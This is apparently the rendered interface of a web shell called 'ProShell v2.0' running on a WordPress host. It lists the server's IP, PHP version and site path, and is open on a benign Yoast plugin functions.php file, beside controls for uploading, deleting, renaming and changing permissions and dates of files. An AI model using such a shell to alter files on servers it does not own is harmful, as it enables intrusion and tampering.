ProShell v2.0
Dashboard
Server Info
Server: 158.106.128.192
PHP: 8.2.33
home
planet5
public_html
bansibaba.com
2026-09-21 16:38:30
Editing: functions.php
Cancel
Save Changes
<?php /** * WPSEO plugin file. * * @package Yoast\WP\SEO\Premium */ use Yoast\WP\Local\Main; /** * Retrieves the main instance. * * @phpcs:disable WordPress.NamingConventions -- Should probably be renamed, but leave for now. * * @return Main The main instance. * * @throws Exception If loading fails and YOAST_ENVIRONMENT is development. */ function YoastSEOLocal() { // phpcs:enable static $main; if ( did_action( 'wpseo_loaded' ) ) { if ( $main === null ) { // Ensure free is loaded as loading Local will fail without it. YoastSEO(); $main = new Main(); $main->load(); } } else { add_action( 'wpseo_loaded', 'YoastSEOLocal' ); } return $main; }
Upload Files
Cancel
Upload
Create New
Cancel
Create
Change Permissions
Cancel
Save
Change Date
Cancel
Save
Rename Item
Cancel
Save
Confirm Delete
Are you sure you want to delete the selected items?
Cancel
Delete